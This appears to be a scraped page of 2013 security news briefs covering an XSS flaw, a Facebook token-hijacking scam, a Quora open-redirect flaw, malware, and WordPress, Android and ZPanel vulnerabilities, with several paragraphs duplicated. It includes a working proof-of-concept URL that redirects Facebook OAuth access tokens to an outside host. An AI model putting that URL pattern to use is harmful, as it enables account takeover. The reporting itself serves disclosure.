Security Researcher Vedachala has discovered a post based Cross site Scripting vulnerability in the Defencely website - A company that provides web application penetration testing service.
The main page of the Defencely allows user to enter their website to get a security report. The form gets the input and pass the website address as "website_url" parameter to "Defencely.com/report_submit.php".
"If a web application is getting user's input, it is always better to double check and make sure the parameter is sanitized."
Veda has identified that "website_url" parameter is not sanitized and vulnerable to post request based XSS. He successfully managed to get the injected-script executed.
In one of the facebook group related to Security , the researcher provided the proof-of-concept(You can also find the details at pastebin.com/9JeJ1HK6). We have successfully verified the vulnerability. At the time of writing, the website is still vulnerable.
The main page of the Defencely allows user to enter their website to get a security report. The form gets the input and pass the website address as "website_url" parameter to "Defencely.com/report_submit.php".
"If a web application is getting user's input, it is always better to double check and make sure the parameter is sanitized."
 |
| Post based xss in Defencely |
Veda has identified that "website_url" parameter is not sanitized and vulnerable to post request based XSS. He successfully managed to get the injected-script executed.
In one of the facebook group related to Security , the researcher provided the proof-of-concept(You can also find the details at pastebin.com/9JeJ1HK6). We have successfully verified the vulnerability. At the time of writing, the website is still vulnerable.
A new spam that preys on people's curiosity is circulating in Facebook. Today, E Hacking News has come across a new spam campaign. The spam post has a picture of women that looks like a video.
"she went inclusively nuts and lost all control of the razor-sharp axe Well, Watch what happened..in..this..video:_:: [Tiny_URL]" The spam post reads.
Following the link provided in the post takes the users to a page where it says "She did this at the tender of age 15" and the site displays an image mimicking an embedded video player.
After clicking the image, i am really inspired by the clever work done by the CyberCriminals. When a user click the image, it asks users to press three shortcuts one by one - Ctrl+L, Ctrl + C, Ctrl +W .
I know what the last two shortcuts do but not sure about the first one. I've managed to find the usage of the Ctrl+L shortcut in browsers. It is being used for selecting the URL.
So the shortcuts are for selecting©ing the url and closing the windows. But wait a second, i failed to notice one thing. When i clicked the image , the page opens a new window.
Interestingly, the new window is so small and not visible. So pressing the shortcut keys copies the URL of the new-window and closes the window. The URL contains the victim's authentication token.
A victims who fail to notice the window and follow the instructions soon find them-self victim to the Facebook spam post. The spam will be posted in the victims' wall using the hijacked authentication token.
"she went inclusively nuts and lost all control of the razor-sharp axe Well, Watch what happened..in..this..video:_:: [Tiny_URL]" The spam post reads.
 | |
| Facebook spam post |
Following the link provided in the post takes the users to a page where it says "She did this at the tender of age 15" and the site displays an image mimicking an embedded video player.
After clicking the image, i am really inspired by the clever work done by the CyberCriminals. When a user click the image, it asks users to press three shortcuts one by one - Ctrl+L, Ctrl + C, Ctrl +W .
I know what the last two shortcuts do but not sure about the first one. I've managed to find the usage of the Ctrl+L shortcut in browsers. It is being used for selecting the URL.
So the shortcuts are for selecting©ing the url and closing the windows. But wait a second, i failed to notice one thing. When i clicked the image , the page opens a new window.
 | |
| Small window -1 |
 | |
| Small window -2 |
Interestingly, the new window is so small and not visible. So pressing the shortcut keys copies the URL of the new-window and closes the window. The URL contains the victim's authentication token.
A victims who fail to notice the window and follow the instructions soon find them-self victim to the Facebook spam post. The spam will be posted in the victims' wall using the hijacked authentication token.
E Hacking News is glad to announce the Defcon Bangalore 2013 - The place where the top Indian Security researchers present their research on Information Security.
Defcon Bangalore is a part of Defcon Community Groups with a registered ID- DC9180. The team is supported by Cyber Security and Privacy Foundation, and provides a platform for talents in the Indian hacking community to showcase their research to a wider audience.The core team of defcon bangalore comprises of Mr. Karthik, Mr. HariKrishnan and Mr. J Prasanna( Founder, Cyber Security & Privacy foundation)
Submit Your research papers:
The call for paper has been opened. Security researchers are invited to submit their research paper. Submit your papers at defconbangalore@cysecurity.org. The call for paper will close on 25th July 2013.
Training:
This year 2013, the DEFCON Bangalore team has initiated free training sessions for the attendees as a part of the meet! The charges incurred by the attendees are under 20 USD per head, this is collected in order to pay for the space occupancy at a 5 star Botique Hotel for the entire day - including snacks, high tea and Lunch. Apart from this no other charges are collected from the attendees.
Cybercriminals have reportedly targeted the Salary accounts of Mumbai Police and managed to withdraw money from their account.
According to NDTV report, cybercriminals have managed to withdraw money from Axis bank accounts of at least 14 Policemen from ATMs in Greece.
It appears hackers in Greece have done this heist by cloning ATM cards of Policemen in Mumbai.
At this time, there is no further information about how much money has been withdrawn and how many policemen have been affected by this heist.
The Mumbai police has formed a team to investigate the hack and bank has been asked to investigate.
An Indian Security researcher Prakhar Prasad has found a way to hack the facebook accounts by exploiting an open redirection flaw in Quora - one of the famous Question&Answer website.
Quora allows users to be signed up through facebook account. While signing up for the quora, researcher noticed quora.com was permitted to receive access token from facebook oAuth.
Prasad has managed to steal the access token from the quora website by exploiting an open-redirect security flaw in the quora.com
POC provided by the researcher:
https://www.facebook.com/dialog/permissions.request?app_id=136609459636&next=https://www.quora.com/contacts/skip?goto=http://poc.prakharprasad.com/quora&response_type=token
"Facebook OAuth authorization URL requests token permission from the user, but as user will have Quora App installed, it will redirect to value specified in next parameter of OAuth authorization URL with a valid access_token" researcher said in his blog.
In this case , the next parameter's value is "https://www.quora.com/contacts/skip?goto=http://poc.prakharprasad.com/quora". So the request will redirect user to the above URL with access token which further redirects to the prasad's page(exploiting open-redirect flaw). The page created by prasad successfully captures the access token and direct users to the facebook.com
Unwitting users who follow the POC link soon find themself victim to the facebook account hack.
Complete technical details can be found in his personal blog.
You can also check out the video demo here:
Quora patched the security flaw few days after the Prasad reported the bug.
In their malware analysis report, TrendMicro researcher said they found a new variant that download malicious components from the SourceForge website.
The report says the malicious files were hosted under a SourceForge project called "tradingfiles". The cybercriminal who created the project has also created two other projects that were also used to host the malicious components of Gamarue : ldjfdkladf and stanteam.
Once it infects the victim's machine, the malware allows cybercriminals to control the system and use it to launch attacks on other victims. It is also designed to steal the information.
The malware finds a way into the victim system through infected USB drives or infected webpage that serves exploit kit.
Every time Apple attempts to improve the security in the new version of iOS, it ends up with a new security bug.
Here comes another iPhone hack to bypass the iOS Lock Screen. A Spanish iPhone users sent a video to Forbes showing how to hack the iOS 7 Beta version to bypass the iPhone Lockscreen.
The security bug can be easily reproduced by going to iOS control Room, accessing the Phone's calculator and then accessing the phone's camera. It is said that the bug allows to deleting, sharing the photos.
The bug has been confirmed by the Forbes. iOS 7 is still in the beta version so it's only available to those with developer accounts.
Earlier this year, we became aware that Vulnerability-Lab discovered iOS Lockscreen vulnerability that allowed anyone to access the data stored on the device.
A security researcher Krzysztof Katowicz-Kowalewski has discovered a critical DOS vulnerability in the latest version of Wordpress (v3.5.1) that allows cybercriminals to cause Denial of service.
The security flaw is "caused due to an error when calculating the hash cycle count within the "crypt_private()" method in /wp-includes/class-phpass.php" according to Secunia report.
By sending specially crafted password cookie, an attacker can cause damage to the website. However, the exploit is limited to those websites who have at least one password protected post and the attacker should have the knowledge of the URL for that post.
Secunia has confirmed the vulnerability existence in latest version 3.5.1. Previous version might also be impacted by the security bug.
The researcher has informed the Wordpress security Team about the security flaw, but since he didn't receive any response from them , he decided to disclose the bug.
The security flaw is "caused due to an error when calculating the hash cycle count within the "crypt_private()" method in /wp-includes/class-phpass.php" according to Secunia report.
By sending specially crafted password cookie, an attacker can cause damage to the website. However, the exploit is limited to those websites who have at least one password protected post and the attacker should have the knowledge of the URL for that post.
Secunia has confirmed the vulnerability existence in latest version 3.5.1. Previous version might also be impacted by the security bug.
The researcher has informed the Wordpress security Team about the security flaw, but since he didn't receive any response from them , he decided to disclose the bug.
Android Operating System is based on the Linux, means the vulnerabilities affecting Linux kernel have the possibility of being exploited in the Android platform.
It appears the recently discovered Linux local kernel privilege escalation vulnerability (CVE-2013-2094) is affecting the Android operating system.
According to Symantec researchers, the exploit for the kernel vulnerability has now been modified to work on Android platform. The security flaw allows hacker to gain complete control of the infected devices.
The researchers have warned that malware will take advantage of this exploit to access data from other apps, prevent users from uninstalling the malware, and allows them to send premium rate SMS.
We are not sure how much time Google will take to patch the bug. So, users are advised to download the apps only from trusted marketplaces.
A critical remote code execution vulnerability has been identified in ZPanel that allows hackers to reset the root password and gain access to the server.
According to the forum post, the latest stable version 10.0.2 is also affected by this security flaw. The user has also provided the steps to reproduce the vulnerability.
The security flaw exists in the ZPX HTPASSWD module because the module fails to sanitize the user input. The flaw allows anyone with access to the page including admins, resellers, clients to inject arbitrary shell commands into the server.
The vulnerability has been confirmed by ZPanel Head Developer & Project Leader ,Bobby Allen. ZPanel Users are advised to disable the HTPASSWD module.
The team is currently testing the patched file which was committed to GitHub. They are promised to issue a manual patch once the test is completed.
